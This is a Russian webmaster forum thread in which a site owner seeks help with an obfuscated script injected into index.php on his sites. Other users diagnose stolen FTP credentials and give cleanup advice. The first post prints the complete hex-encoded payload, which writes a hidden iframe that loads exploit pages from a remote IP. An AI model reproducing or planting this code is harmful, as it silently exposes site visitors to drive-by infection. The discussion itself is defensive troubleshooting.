На страницу 1, 2 След. |
|
|
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
Привет!
У меня такая история, взял хостинг к которому можно прикрутить 5 доменов.
4 сайта не вордпресе, один сайт на движке, который писал один знакомый.
Короче обнаружил на всех сайтах вот такую запись
| Код: |
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479c9fa343af2(v479c9fa343efc){ function v479c9fa3442e5 () {return 16;} return(parseInt(v479c9fa343efc,v479c9fa3442e5()&
#41;);}function v479c9fa344af0(v479c9fa344eea){ function v479c9fa345b0a () {return 2;} var v479c9fa3452fe='';for(v479c9fa3456f8=0; v479c9fa3456f8<v479c9fa344eea.length; v479c9fa3456f8+=v479c9fa345b0a()){ v479c9fa3452fe+=(String.fromCharCode(v479c9fa343af2(
v479c9fa344eea.substr(v479c9fa3456f8, v479c9fa345b0a()))));}return v479c9fa3452fe;} document.write(v479c9fa344af0('3C5343524950543E77696E646
F772E7374617475733D27446F6E65273B646F63756D656E742E7772697465282
73C696672616D65206E616D653D3037663863207372633D5C27687474703A2F2
F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D617
4682E726F756E64284D6174682E72616E646F6D28292A3531383837292B27653
437626563313466625C272077696474683D353833206865696768743D3839207
374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653
E27293C2F5343524950543E'));</script>
|
Эта запись стоит в исходном коде в самом низу. Кто подскажет что это и как бороться.
Написал в сапорт хостинга, там сказали типа разбирайтесь сами.
пример сайта _photoles.ru могу все написать, но думаю ни к чему. |
|
|
|
|
|
|
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
да и еще, как я понял это модуль, который перенаправляет моих посетителей, точнее не перенаправляет, а накручивает моих посетителей на счетчик других сайтов. Можно как-то понять каких? Я так понимаю что какой-то сеошник кидает какого-то рекламодателе через меня. Хотел бы короче узнать кто это и    этого чувака. Если конечно он в пределах досягаемости. |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
| реально эту дуру видит только каспер. Если у кого-то каспер, то посмотрите плиз как называется вирус |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
В кратце:
заражает файл index.php, расположенный в корневой директории сайта, путём дописывания в его конец вредоносного? javascript кода....
Делает это предположительно в автоматическом режиме...
такой троян гремел год назад у agava.ru
заражает файлы index.php |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
сам с собой поговорил  |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
Жека
Профессионал |
Зарегистрирован: 07.12.2005
Сообщ.: 857
|
Обратиться по нику
|
|
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять. |
|
|
|
|
|
Ссылочный бизнес для серьезных людей: ссылки, статьи. Сопровождение рефов |
![]()
Li-Hua
Чинамэн |
Зарегистрирован: 24.12.2005
Сообщ.: 8807
|
Обратиться по нику
|
|
| m_Stasuk, у тебя от фтп пассы увели и ифрейм поставляли или ты сателлиты купил готовые такие? я не понял из первого поста |
|
|
|
|
|
Главмед - круче всех |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
| я не знаю как получилось. Все 5 сайтов делал я сам. Похоже что меня ломанули все же. |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
Li-Hua
Чинамэн |
Зарегистрирован: 24.12.2005
Сообщ.: 8807
|
Обратиться по нику
|
|
| Ну тогда тебя или хостинг ломанули, меняй пассы, апдейти ВП, проверь свой комп. |
|
|
|
|
|
Главмед - круче всех |
![]()
agrasoff
Свой |
Зарегистрирован: 08.12.2007
Сообщ.: 107
|
Обратиться по нику
|
|
| Жека писал(а): |
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять.
|
да, самое частое - это ftp-аккаунты у тебя берут, которые локально на твоем компе хранятся.. и все действия, которые жека перечислил очень ценные :)
а чем ты пользуешься для работы с ftp? интересно просто. вот в total commander'e пароли в открытом виде хранятся. поэтому их очень
легко оттуда взять и попользовать. |
|
|
|
|
|
Хостинг в US. Budget, Business, Dedicated. 375 GB за $3 в месяц. |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
короче этот модуль отравлял мне жизнь все это время.
сейчас нашли решение. Файлу index.php поставили атрибуты 444. Это скорее всего должно искоренить проблему. |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
Dmitr
Профессионал |
Зарегистрирован: 23.04.2007
Сообщ.: 931
|
Обратиться по нику
|
|
только там ничего не накручивается, там на сплойты на сплойты всё ...
а если уж антивирь ворчит, то слова мои подтверждает. по сути Жека отписал элементарно что сделать. |
|
|
|
|
|
Блог | Индивидуальный хостинг в США с ру саппортом. |
![]()
densa
Опытный |
Зарегистрирован: 27.06.2006
Сообщ.: 411
|
Обратиться по нику
|
|
| скорее всего у тебя пароли от фтп увели. Если так то хоть какие права поставь, переписать его всеравно можно будет. Работай над защитой своего компа |
|
|
|
|
|
Тема для ВордПресса
Что купить новорожденному |
![]()
m_Stasuk
Опытный |
Зарегистрирован: 23.12.2007
Сообщ.: 319
|
Обратиться по нику
|
|
то что Жека написал я делал 500 000 миллионов раз. Не помогло.
Чищу комп, меняю пароли, но через время модуль появляется опять.
Сейчас пока затишье. |
|
|
|
|
|
сюда жать
школа фотошоп |
![]()
IseeDeadPeople
Бог-лошадка |
Зарегистрирован: 05.12.2005
Сообщ.: 2010
|
Обратиться по нику
|
|
а.. лала.. пам пам.. тум тум..
а бывает в наших краях... лам лам пам пам...
когда даже платный хостер.. ла ла пам пам
.......... на всем своем .. машинке ... ла ла пам пам СТАВИТ НА НЕКОТОРОЕ ВРЕМЯ .. ла ла пам пам ТИПА ИФР#ЙМ какого нить троя как АДДОН РЕВРИТЕР НА ВЕСЬ ВЫВОД ХТМЛ контента с машинке..
пали что за хостер  |
|
|
|
|
|
Продай таблетку буржую, получи деньги! EvaPharmacy.ru - партнерка, проверенная временем.
купи немного ботов за ипасс тут .. .. и слей их сюды [Помолимся! ... Посмотрим.] |
|
|
